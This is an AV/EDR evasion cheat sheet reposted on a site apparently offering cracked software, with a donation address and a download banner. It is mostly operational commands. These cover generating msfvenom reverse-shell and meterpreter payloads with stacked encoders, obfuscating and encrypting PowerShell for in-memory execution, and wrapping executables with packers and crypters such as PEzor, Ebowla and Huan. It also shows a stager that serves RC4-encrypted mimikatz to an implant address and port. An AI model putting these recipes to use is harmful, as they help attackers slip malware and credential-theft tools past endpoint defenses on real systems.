Support Crack-Vault and help us keep providing free tools. Every donation counts! (BTC) Address: bc1qhhva8uplmkaa3kkwxnux9t3y6l6kmhnwqzktzn

AV / EDR Evasion Notes

groot5t1

BypassAV Notes and cheat sheet

Some Prominent resources

Recon

Common AV Process Names

avp.exe
Vendor/Product: Kaspersky Internet Security (KIS) / Kaspersky Endpoint Security (KES)
cpda.exe
Vendor/Product: Check Point Endpoint Security
egui.exe
Vendor/Product: ESET GUI
ekrn.exe
Vendor/Product: ESET Kernel Service
MsMpEng.exe
Vendor/Product: Windows Defender
ntrtscan.exe
Vendor/Product: Trend Micro OfficeScan
tmlisten.exe
Vendor/Product: Trend Micro OfficeScan

Search for Active AV Processes on Hosts

Note: Local admin privileges required.
Cmd > WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName PS > Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntivirusProduct PS > gc .\100-hosts.txt | % {gwmi -Query "select * from Win32_Process" -ComputerName $_ | ? {$_.Caption -in "MsMpEng.exe"} | select ProcessName,PSComputerName}

Identify Microsoft.NET version from inspecting assembly properties:
PS > cd C:\Windows\Microsoft.NET\Framework64\ PS > ls PS > cd .\v4.0.30319\ PS > Get-Item .\clr.dll | Fl Or PS > [System.Diagnostics.FileVersionInfo]::GetVersionInfo($(Get-Item .\clr.dll)).FileVersion

Identify Microsoft.NET version from querying the registry:
PS > Get-ItemProperty "HKLM:SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\Full" -Name Release

Windows Build <-> Default .NET Framework Version Associations

1511
Default .NET Framework Version: 4.6.1
1607
Default .NET Framework Version: 4.6.2
1703
Default .NET Framework Version: 4.7
1709
Default .NET Framework Version: 4.7.1
1803
Default .NET Framework Version: 4.7.2
1909+
Default .NET Framework Version: 4.8

.NET Framework Version <-> CLR Version Associations

2.0, 3.0, 3.5
CLR Version: 2
4, 4.5-4.8
CLR Version: 4

Note: You don't have to target the exact .NET Framework version when compiling your tools. It's sufficient to match the above relationship between .NET Framework version and CLR version. For instance, all 4.x versions will execute on CLR v4. For example, Rubeus compiled to target v4.5 will run on a machine with only .NET v4.0 installed.

Attacking EDRs

EDRPrison

WinDivert

.NET

Python

EDR Blindspots

Bring Your Own Interpreter (BYOI)

Bring Your Own Interpreter

Python

BOFs with Python

Python RDI

PE Obfuscation

Obfuscator Blog Post

OLLVM

Note: Install LLVM 13.x obfuscator based on heroims/obfuscator and tpoechtrager/wclang.
apk update apk add --no-cache build-base cmake git python3 mingw-w64-gcc rm -rf /var/cache/apk/* git clone --depth=1 -b llvm-13.x --single-branch https://github.com/heroims/obfuscator /opt/ollvm cd /opt/ollvm wget https://github.com/llvm/llvm-project/commit/ff1681ddb303223973653f7f5f3f3435b48a1983.patch patch llvm/include/llvm/Support/Signals.h < ff1681ddb303223973653f7f5f3f3435b48a1983.patch mkdir build cd build cmake -DCMAKE_BUILD_TYPE=Release -DLLVM_ENABLE_NEW_PASS_MANAGER=OFF ../llvm sed -i 's/LLVM_TOOL_CLANG_BUILD:BOOL=OFF/LLVM_TOOL_CLANG_BUILD:BOOL=ON/g' CMakeCache.txt sed -i "s|LLVM_EXTERNAL_CLANG_SOURCE_DIR:PATH=|LLVM_EXTERNAL_CLANG_SOURCE_DIR:PATH=realpath ../clang|g" CMakeCache.txt make -j7 make install git clone --depth=1 https://github.com/tpoechtrager/wclang /opt/wclang cd /opt/wclang cmake . make -j7 make install rm -rf /opt/ollvm /opt/wclang && mkdir /build

String Encryption

Tools

PowerShell Tactics

PowerShell Obfuscation

Invoke-Obfuscation

Out-EncryptedScript.ps1

PS > Out-EncryptedScript .\script.ps1 $(ConvertTo-SecureString 'Passw0rd!' -AsPlainText -Force) s4lt -FilePath .\evil.ps1 PS > . .\evil.ps1 PS > $dec = de "Passw0rd!" s4lt PS > Invoke-Expression $dec

PowerShellArmoury

PS > git clone https://github.com/cfalta/PowerShellArmoury PS > cd PowerShellArmoury PS > curl https://github.com/snovvcrash/WeaponizeKali.sh/raw/main/conf/PSArmoury.json -o PSArmoury.json PS > . .\New-PSArmoury.ps1 PS > New-PSArmoury -ValidateOnly -Config PSArmoury.json PS > New-PSArmoury -Path armored.ps1 -Config PSArmoury.json PS > cat -raw .\armored.ps1 | iex

Tools

msfvenom

$ msfvenom -p windows/shell_reverse_tcp LHOST=127.0.0.1 LPORT=1337 -a x86 --platform win -e x86/shikata_ga_nai -i 3 -f exe -o rev.exe $ msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=1337 -e x86/shikata_ga_nai -i 9 -f raw | msfvenom --platform windows -a x86 -e x86/countdown -i 8 -f raw | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 11 -f raw | msfvenom -a x86 --platform windows -e x86/countdown -i 6 -f raw | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 7 -k -f exe -o met.exe

Veil-Evasion

Hyperion
Pescramble

$ wine hyperion.exe input.exe output.exe $ wine PEScrambler.exe -i input.exe -o output.exe

GreatSCT

GreatSCT GitHub Repository
Install and generate a payload:
$ git clone https://github.com/GreatSCT/GreatSCT ~/tools/GreatSCT $ cd ~/tools/GreatSCT/setup $ ./setup.sh $ cd .. && ./GreatSCT.py ...generate a payload... $ ls -la /usr/share/greatsct-output/handlers/payload.{rc,xml} $ msfconsole -r /usr/share/greatsct-output/handlers/payload.rc

Exec with msbuild.exe and get a shell:
PS > cmd /c C:\Windows\Microsoft.NET\framework\v4.0.30319\msbuild.exe payload.xml

Ebowla

$ git clone https://github.com/Genetic-Malware/Ebowla ~/tools/Ebowla && cd ~/tools/Ebowla $ sudo apt install golang mingw-w64 wine python-dev -y $ sudo python -m pip install configobj pyparsing pycrypto pyinstaller $ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.13.37 LPORT=1337 --platform win -f exe -a x64 -o rev.exe $ vi genetic.config ...Edit output_type, payload_type, clean_output, [[ENV_VAR]]... $ python ebowla.py rev.exe genetic.config && rm rev.exe $ ./build_x64_go.sh output/go_symmetric_rev.exe.go ebowla-rev.exe [--hidden] && rm output/go_symmetric_rev.exe.go [+] output/ebowla-rev.exe

PEzor

PEzor GitHub Repository

Wrap executable into PEzor:

$ bash PEzor.sh -sgn -unhook -antidebug -text -syscalls -sleep=10 evil.exe -z 2

inceptor

ScareCrow

Huan

Huan GitHub Repository
Cmd > .\Huan.exe mimikatz.exe mimiLoader.exe Cmd > .\mimiLoader.exe

charlotte
charlotte GitHub Repository
dll4shell GitHub Repository
$ sudo apt install 'mingw-w64*' -y $ msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.13.37 LPORT=1337 -f raw > beacon.bin $ python charlotte.py Cmd > rundll32.exe charlotte.dll, <XOR_KEY>

MeterPwrShell

$ sudo ./MeterPwrShell2Kalix64 -c noaptupdate

stager_libpeconv

stager_libpeconv GitHub Repository
libpeconv GitHub Repository
$ git clone --recurse-submodules https://github.com/tothi/stager_libpeconv && cd stager_libpeconv $ openssl enc -rc4 -in mimikatz.exe -Kecho -n '1234567890123456' | xxd -p-nosalt -out mimikatz.rc4 $ make stager IMPLANT_IP=10.10.13.37 IMPLANT_PORT=1337 RC4_KEY=1234567890123456 $ ./socket_binary_server.py mimikatz.rc4 10.10.13.37 1337 Cmd > dist\stager.exe

📱

Download Now—Top Software, No Cost!